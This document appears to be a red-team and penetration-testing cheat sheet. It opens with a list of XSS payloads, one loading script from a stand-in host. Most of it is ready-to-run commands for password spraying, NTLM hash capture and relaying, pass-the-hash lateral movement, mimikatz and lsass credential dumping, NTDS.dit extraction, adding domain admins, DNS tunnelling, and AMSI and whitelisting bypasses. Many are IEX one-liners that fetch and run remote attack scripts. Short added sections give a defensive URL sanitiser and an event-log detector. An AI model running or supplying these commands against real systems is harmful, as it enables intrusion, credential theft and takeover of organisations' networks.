";!--"<XSS>=&{()}

<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"">
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC="jav ascript:alert('XSS');">

perl -e 'print "<IMG SRC=javascript:alert(\"XSS\")>";' > out

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(">< iframes http://google.com < iframes >)

<BODY BACKGROUND="javascript:alert('XSS')">
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
"><script >alert(document.cookie)</script>
%253cscript%253ealert(document.cookie)%253c/script%253e
"><s"%2b"cript>alert(document.cookie)</script>
%22/%3E%3CBODY%20onload='document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E
<img src=asdf onerror=alert(document.cookie)>

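Most of the payloads above beat naive filters in one of two ways: the javascript: scheme is disguised (HTML character references, with or without semicolons, a tab inside the word) or the input lands in an attribute or text context without encoding. As an added example, not from the OWASP sheet or the original cheat sheet, here is the defender's side: a URL check that normalises the way a browser does before looking at the scheme, and a rendering function shown in its vulnerable and hardened forms. Function names and the allowlist are my own choices.

```python
import html
import re
from urllib.parse import urlsplit

# Characters to drop before inspecting the scheme: browsers ignore tab, CR and LF
# inside a URL (so "jav<TAB>ascript:" still runs). This is deliberately stricter
# and also drops the other C0 controls, space and DEL.
_CONTROL_OR_WS = re.compile(r"[\x00-\x20\x7f]")
_ALLOWED_SCHEMES = {"http", "https", "mailto"}  # allowlist, adjust per application


def is_safe_url(raw: str) -> bool:
    """Accept a URL only if its scheme is allowlisted after the decoding a browser
    applies: character references resolved (so "&#106;avascript:" and the
    semicolon-less "&#0000106..." form both become "javascript:"), ignorable
    characters removed, case folded. Scheme-less (relative) URLs are accepted."""
    decoded = html.unescape(raw)               # resolves &#106; and &#0000106 alike
    cleaned = _CONTROL_OR_WS.sub("", decoded)  # used only for the scheme check
    scheme = urlsplit(cleaned).scheme.lower()
    return scheme == "" or scheme in _ALLOWED_SCHEMES


def render_profile_unsafe(name: str, site: str) -> str:
    # Constructed 'before': user-controlled values concatenated straight into HTML.
    return f'<p>{name}</p><a href="{site}">site</a>'


def render_profile_safe(name: str, site: str) -> str:
    # Hardened: escape for the element-text context, escape the attribute value with
    # quotes encoded (defeats the "><img src=x onerror=...> breakout), and neutralise
    # the href when its scheme is not allowed.
    href = site if is_safe_url(site) else "#"
    return (
        f"<p>{html.escape(name, quote=True)}</p>"
        f'<a href="{html.escape(href, quote=True)}">site</a>'
    )


if __name__ == "__main__":
    for candidate in ("javascript:alert('XSS')", "jav\tascript:alert('XSS')",
                      "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
                      "https://example.com/"):
        print(repr(candidate), "->", is_safe_url(candidate))
    print(render_profile_safe("<script>alert(document.cookie)</script>", "javascript:alert('XSS')"))
```

Encoding must match the context the value lands in; html.escape covers element text and quoted attribute values, but a value written into a script block, an event-handler attribute or a CSS property needs that context's own encoder, which is why an allowlisted scheme check is applied to the URL rather than trying to escape it.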
SSH Over SCTP (using Socat)

$ socat SCTP-LISTEN:80,fork TCP:localhost:22
$ socat TCP-LISTEN:1337,fork SCTP:SERVER_IP:80
$ ssh -lusername localhost -D 8080 -p 1337

Metagoofil – Metadata collection tool

Note: Metagoofil is a tool for collecting information using Google.
$ python metagoofil.py -d example.com -t doc,pdf -l 200 -n 50 -o examplefiles -f results.html

Use a DNS tunnel to bypass the firewall

$ apt-get update
$ apt-get -y install ruby-dev git make g++
$ gem install bundler
$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server
$ bundle install
$ ruby ./dnscat2.rb
dnscat2> New session established: 16059
dnscat2> session -i 16059

Red-Team and Infrastructure Assessments

External recon

https://github.com/dcsync/recontools

O365 bruting

python3 office365userenum.py -u test.txt -v -o output.txt --password 'Password1'

Enumeration (opsec safe):

python o365creeper.py -f test.txt

https://github.com/0xZDH/o365spray

subdomain finder

https://spyse.com/

https://crt.sh (search for %.blah.com)

search categorized expired domain

python3 ./domainhunter.py -r 1000

Metadata

PS C:\> Invoke-PowerMeta -TargetDomain targetdomain.com

Domain User Enumeration

MailSniper

Usernameharvest

Invoke-UsernameHarvestOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Threads 1 -OutFile owa-valid-users.txt

Domainnameharvest

Invoke-DomainHarvestOWA -ExchHostname mail.domain.com

OWA Spray

Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile owa-sprayed-creds.txt

Grab employee names from Linkedin

theharvester -d blah.com -l 1000 -b linkedin

https://github.com/m8r0wn/CrossLinked

Extract Linkedin details from snov.io

Regex to extract emails

grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b"

Extract from burp

cat linkedin.txt | tr , '\n' | sed 's/"//g' | awk '/"title":{"textDirection":"FIRST_STRONG"/{getline; print}'

Change format to b.lah

# Append the lowercased first initial joined to the last name to each "First Last" line
awk '{print $0,tolower(substr($1,1,1)$NF)}' names.txt

Check usernames against AD:

Handy if you have generated a list from linkedin or a list of usernames.

nmap -p 88 1.1.1.1 --script krb5-enum-users --script-args krb5-enum-users.realm="DOMAIN"

username list is located at /usr/local/share/nmap/nselib/data/usernames.lst in Kali

Null sessions

Still works on infra that was upgraded from 2k, 2k3.

net use \\IP_ADDRESS\ipc$ "" /user:""

Use enum4linux, enum or Dumpsec following the null session setup.

GPP

https://bitbucket.org/grimhacker/gpppfinder/src/master/

findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml

situational awareness

https://github.com/dafthack/HostRecon

Privesc checks: https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation

Network Attacks

Responder

Grab NetNTLM hashes off the network

Without wpad:

responder -I eth0

With wpad:

responder -I eth0 --wpad -b -f -F

Filter logs from logs folder and remove machine accounts:

sort -m *.txt | uniq -d | awk '!/\$/'

Cracking with John:

john SMB-NTLMv2-Client-172.20.22.217.txt --wordlist=/root/passwords.txt

Use hashcat on a more powerful box. This is only for easy wins.

NTLM Relaying

ntlmrelayx.py -tf targets.txt -c <insert Empire Powershell launcher>

MITM6

python mitm6.py -d blah.local

Capture hashes

impacket-smbserver hiya /tmp/ -smb2support

Bruteforce domain passwords

Common Passwords

$Company1 $Season$Year Password1 Password! Welcome1 Welcome! Welcome@123 P@55word P@55w0rd $month$year

Using hydra

hydra -L users.txt -p Password1 -m 'D' 172.20.11.55 smbnt -V

Bruteforce using net use

@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\DOMAINCONTROLLER\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\DOMAINCONTROLLER\IPC$ > NUL

all systems

net view /domain > systems.txt

Local admin search using net use

@FOR /F %s in (systems.txt) DO @net use \\%s\C$ /user:domain\username Password 1>NUL 2>&1 && @echo %s>>admin_access.txt && @net use /delete \\%s\C$ > NUL

Domain joined machine

Invoke-DomainPasswordSpray -Password Spring2017

Non-domain joined testing

When you have an initial set of compromised credentials, run these from a virtual machine to establish a foothold on the network as a domain user.

Shell with domain user privileges

C:\runas.exe /netonly /user:BLAHDOMAIN\blahuser cmd.exe

runas /netonly /user:blah@blah.com "mmc %SystemRoot%\system32\dsa.msc"

Make sure you use the FQDN of the domain and set the reg key as below.

check dc:

nltest /dsgetdc:domain.local

To change DC via registry to point at domain being tested:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\SiteName = DC1.domain.com

Create session for use with dumpsec

net use \\10.0.0.1\ipc$ /user:domain.local\username password

Quick User lists and password policy enum

net users /domain

net group /domain "Domain Admins"

net accounts /domain

Note that the above commands do not work with runas. Below PowerView functions will work with runas.

Powerview:

. .\PowerView.ps1

Get-UserProperty -Properties samaccountname

Get-NetGroupMember

Get-DomainPolicy

Search shares and files using Invoke-FileFinder and Invoke-ShareFinder

Domain Analysis

BloodHound

Run locally on non-domain joined machine (remember to add target domain to registry):

. .\BloodHound.ps1

Invoke-BloodHound

SharpHound

SharpHound.exe --CollectionMethod All

Run from remote shell

Useful when you have a remote shell.

powershell Set-ExecutionPolicy RemoteSigned

powershell -command "& { . C:\BloodHound.ps1; Invoke-BloodHound }"

Run from web server or over Internet:

Use this when you cannot copy BloodHound.ps1 over to target.

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/PowerShell/BloodHound.ps1'); Invoke-BloodHound"

Run using Sharppick - AMSI bypass

SharpPick.exe -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1'); Invoke-BloodHound"

SharpPick-64.exe -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks"

Goddi (fast dump all domain info)

.\godditest-windows-amd64.exe -username=testuser -password="testpass!" -domain="test.local" -dc="dc.test.local" -unsafe

ADRecon (More detailed - Good for AD Auditing)

https://github.com/sense-of-security/ADRecon

Share and file finder

Invoke-ShareFinder -CheckShareAccess -Verbose -Threads 20 | Out-File -Encoding Ascii interesting-shares.txt

Invoke-FileFinder -ShareList .\interesting-shares.txt -Verbose -Threads 20 -OutFile juicy_files.csv

Eyewitness

docker run --rm -it -v /tmp/blah:/tmp/EyeWitness eyewitness --web --single https://www.google.com

Windows priv esc

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

Compromise and Lateral Movement

Crackmapexec

crackmapexec smb 172.16.110.0/24

crackmapexec smb 172.16.110.154 -u Administrator -p Password1 -x 'ipconfig'

crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --pass-pol

crackmapexec smb 172.16.110.154 -u Administrator -p Password1 -M mimikatz

crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --sam

crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --lsa

Winexe to boxes (not OPSEC safe): a service is installed and run, with no cleanup.

pth-winexe //10.0.0.1 -U DOMAIN/zdefense/blahuser%blahpassword cmd

pth-winexe //10.0.0.1 -U DOMAIN/zdefense/blahuser%hash cmd

Impacket psexec.py to boxes (not OPSEC safe): it cleans up afterwards but leaves logs from installing and running the service.

psexec.py user@IP

psexec.py user@IP -hashes ntlm:hash

Impacket wmiexec.py (OPSEC safe unless WMI logging is enabled)

wmiexec.py domain/user@IP

wmiexec.py domain/user@IP -hashes ntlm:hash

Impacket smbclient (probably OPSEC safe, as it only uses SMB)

python smbclient.py domain/blahuser@10.0.0.1 -hashes aad3b435b51404eeaad3b435b51404ee:blah

RDP Pass the Hash

Using mimikatz:

privilege::debug
sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run:"mstsc.exe /restrictedadmin"

If Restricted Admin mode is disabled on the target, enable it first (sets DisableRestrictedAdmin to 0):

sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run:powershell.exe
Enter-PSSession -Computer <Target>
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force

Invoke-TheHash (Invoke-WMIExec)

Invoke-WMIExec -Target blah -Username blah -Hash NTLMHASH -Command blah

Password dumping

From Live Kali on a workstation

samdump2 SYSTEM SAM > hashes.txt

Local

C:\> reg.exe save hklm\sam c:\temp\sam.save

C:\> reg.exe save hklm\security c:\temp\security.save

C:\> reg.exe save hklm\system c:\temp\system.save

secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

pwdump system sam

In Memory

C:\> procdump.exe -accepteula -ma lsass.exe c:\lsass.dmp 2>&1

C:\> mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit

C:\> mini.exe (ATPMiniDump):

https://github.com/b4rtik/ATPMiniDump

From box

mimikatz # privilege::debug
mimikatz # sekurlsa::logonPasswords full

Remote

impacket-secretsdump Administrator@ip

impacket-secretsdump Administrator@ip -hashes ntlm:hash

Domain

To find where NTDS.dit is stored, run:

reg.exe query hklm\system\currentcontrolset\services\ntds\parameters

vssadmin

C:\> vssadmin list shadows

C:\> vssadmin create shadow /for=C:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .

secretsdump.py -system system.save -ntds ntds.dit local -just-dc-ntlm

Remove machine accounts from the dump:

grep -a -F ':::' hashes.txt | grep -av '$:' > finalhashes.txt

Extract only the passwords (for pipal):

cut -f 3 -d ':' cracked_with_users_enabled.txt

vssadmin delete shadows /shadow={cd534584-a272-44ab-81e1-ab3f5fbe9b29}

Use godumpsecrets for a faster dump.

ntdsutil

C:\>ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\pentest
ifm: quit
ntdsutil: quit

ntdsutil snapshot session:

C:\>ntdsutil
ntdsutil: snapshot
snapshot: list all
snapshot: create
snapshot: mount 1

Cleanup snapshots:

snapshot: list all
snapshot: unmount 1
snapshot: list all
snapshot: delete 1

Post Compromise (Not opsec safe)

Add user to local admin and domain admin

Add Domain Admin

net user username password /ADD /DOMAIN

net group "Domain Admins" username /ADD /DOMAIN

Add Local Admin

net user username password /ADD

net localgroup Administrators username /ADD

Tasklist scraper to find logged in admins

If PowerShell is not available or BloodHound cannot be run, this script pulls the process list from each host so logged-in admins can be spotted.

#!/bin/sh
# Reads one IP per line from ip.txt and runs ipconfig and a verbose tasklist on each host.
while read -r ip; do
    pth-winexe -U Admin%hash "//$ip" "ipconfig"
    pth-winexe -U Admin%hash "//$ip" "tasklist /v"
done < ip.txt

Kerberoasting

Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat

https://raw.githubusercontent.com/xan7r/kerberoast/master/autokerberoast.ps1

Invoke-AutoKerberoast

python autoKirbi2hashcat.py <ticket file from Invoke-AutoKerberoast>

IEX (New-Object Net.WebClient).DownloadString('https://github.com/EmpireProject/Empire/raw/master/data/module_source/credentials/Invoke-Kerberoast.ps1'); Invoke-Kerberoast

Hashcat on Alienware (NVIDIA GPU) - kerbtgt hash cracking

sudo apt-get install nvidia-367

sudo nvidia-smi

reboot

sudo hashcat -I

hashcat -m 13100 kerb.txt ~/Downloads/realuniq.lst

LAPS - GetLAPSPasswords

https://github.com/kfosaaen/Get-LAPSPasswords/blob/master/Get-LAPSPasswords.ps1

Priv Esc

Powerup

IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellEmpire/PowerTools/raw/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks

File Transfer

SMB Server in Kali

python smbserver.py test /root/tools

Python Web Server

python -m SimpleHTTPServer <port>    (Python 2; on Python 3 use: python3 -m http.server <port>)

Domain Fronting

https://blog.cobaltstrike.com/2017/02/06/high-reputation-redirectors-and-domain-fronting/
https://signal.org/blog/doodles-stickers-censorship/
https://www.securityartwork.es/2017/01/24/camouflage-at-encryption-layer-domain-fronting/
https://trac.torproject.org/projects/tor/wiki/doc/meek
http://bryceboe.com/2012/03/12/bypassing-gogos-inflight-internet-authentication/

AWL bypasses

PowerShell without powershell.exe

SharpPick.exe -d "http://zdefense/blah.ps1"

SquiblyTwo

wmic.exe os get /format:"http://zdefense/foo.xsl"

Sharpshooter

https://www.mdsec.co.uk/2018/03/payload-generation-using-sharpshooter/

python SharpShooter.py --stageless --dotnetver 2 --payload js --output foo --rawscfile ./output/payload.bin --smuggle --template mcafee --com xslremote --awlurl http://ZDefense/foo.xsl

Cypher queries (BloodHound)

Computers on which a given user has local admin (directly or via group membership):

MATCH (u:User)-[r:MemberOf|:AdminTo*1..]->(c:Computer) return u.name, collect(c.name)

List of Domain Admins:

MATCH p=(u:User)-[:MemberOf]->(g:Group) WHERE g.name= "DOMAIN ADMINS@ZDefense" return u.displayname

dnscat2 (DNS tunnelling)

https://downloads.skullsecurity.org/dnscat2/
https://github.com/lukebaggett/dnscat2-powershell

$ dnscat --host <dnscat server_ip>

Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

Invoke-BypassUAC and start a PowerShell prompt as Administrator [or substitute any other command]

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

Invoke-Mimikatz: Dump credentials from memory

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

Import Mimikatz Module to run further commands

powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"

Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"

PowerUp: Privilege escalation checks

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"

Invoke-Inveigh and log output to file

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -Proxy Y -LogOutput Y -FileOutput Y"

Invoke-Kerberoast and provide Hashcat compatible hashes

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"

Invoke-ShareFinder and print output to file

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"

Import PowerView Module to run further commands

powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"

Invoke-Bloodhound

powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

Find GPP Passwords in SYSVOL

findstr /S cpassword $env:logonserver\sysvol\*.xml

findstr /S cpassword %logonserver%\sysvol\*.xml    (cmd.exe)

Run a PowerShell prompt as a different user without loading that user's profile on the machine [replace DOMAIN and USER]

runas /user:DOMAIN\USER /noprofile powershell.exe

Add a registry value to enable WDigest plaintext credential caching on newer versions of Windows

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest /v UseLogonCredential /t REG_DWORD /d 1
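The OPSEC notes on this page say that psexec leaves a service-install log entry, that wmiexec is visible when WMI or process logging is on, and that the WDigest and DisableRestrictedAdmin registry changes are noisy. As an added example (not from the original page or from any of the tools it lists), here is a small Python detector that runs those checks over constructed Windows event records; the flattened field names, the sample events and the "new service whose image sits directly under %SystemRoot%" heuristic are assumptions.

```python
import re
from typing import Dict, Iterable, List, Optional, Tuple

# Sysinternals PsExec installs a service named PSEXESVC; Impacket psexec.py writes a
# randomly named binary into ADMIN$ (the Windows directory) and registers it as a service,
# so a new service imaged directly under %SystemRoot% is flagged (assumed heuristic, tune it).
SVC_ROOT_IMAGE = re.compile(r"^(%SystemRoot%|C:\\Windows)\\[^\\]+\.exe$", re.IGNORECASE)
# wmiexec.py runs each command under WmiPrvSE.exe and redirects its output to a file
# named __<timestamp> in the ADMIN$ share, addressed through the loopback interface.
WMIEXEC_OUTPUT = re.compile(r"\\\\127\.0\.0\.1\\ADMIN\$\\__", re.IGNORECASE)
# Registry values the cheat sheet sets: WDigest plaintext caching on, Restricted Admin on.
RISKY_REG = {
    r"securityproviders\wdigest\uselogoncredential": "0x00000001",
    r"control\lsa\disablerestrictedadmin": "0x00000000",
}

def classify(ev: Dict[str, object]) -> Optional[str]:
    eid = ev.get("event_id")
    if eid == 7045:  # System log: a service was installed
        if str(ev.get("ServiceName", "")).upper() == "PSEXESVC":
            return "psexec-service-install"
        if SVC_ROOT_IMAGE.match(str(ev.get("ImagePath", ""))):
            return "suspicious-service-install"
    elif eid == 4688:  # Security log: process creation (command-line auditing on)
        parent = str(ev.get("ParentProcessName", "")).lower()
        if parent.endswith("wmiprvse.exe") and WMIEXEC_OUTPUT.search(str(ev.get("CommandLine", ""))):
            return "wmiexec-execution"
    elif eid == 13:  # Sysmon: registry value set
        target = str(ev.get("TargetObject", "")).lower()
        for suffix, bad_value in RISKY_REG.items():
            if target.endswith(suffix) and bad_value in str(ev.get("Details", "")):
                return "credential-exposure-registry-change"
    return None

def detect(events: Iterable[Dict[str, object]]) -> List[Tuple[str, str]]:
    # (host, tag) for every event that matched a rule, in input order
    return [(str(ev.get("host", "?")), tag) for ev in events if (tag := classify(ev))]

# Constructed sample records (field names flattened from the EVTX XML; not real telemetry).
SAMPLE_EVENTS = [
    {"event_id": 7045, "host": "ws01", "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"event_id": 7045, "host": "ws01", "ServiceName": "Spooler", "ImagePath": r"%SystemRoot%\System32\spoolsv.exe"},
    {"event_id": 7045, "host": "ws04", "ServiceName": "xKqT", "ImagePath": r"%systemroot%\hWpLrNsE.exe"},
    {"event_id": 4688, "host": "ws02", "ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000.5 2>&1"},
    {"event_id": 13, "host": "ws03", "Details": "DWORD (0x00000001)",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential"},
    {"event_id": 13, "host": "dc01", "Details": "DWORD (0x00000000)",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin"},
]
```

Calling detect(SAMPLE_EVENTS) returns one (host, tag) pair per matching record and nothing for the benign Spooler install; the same rules can be fed from a SIEM export once the field names are mapped.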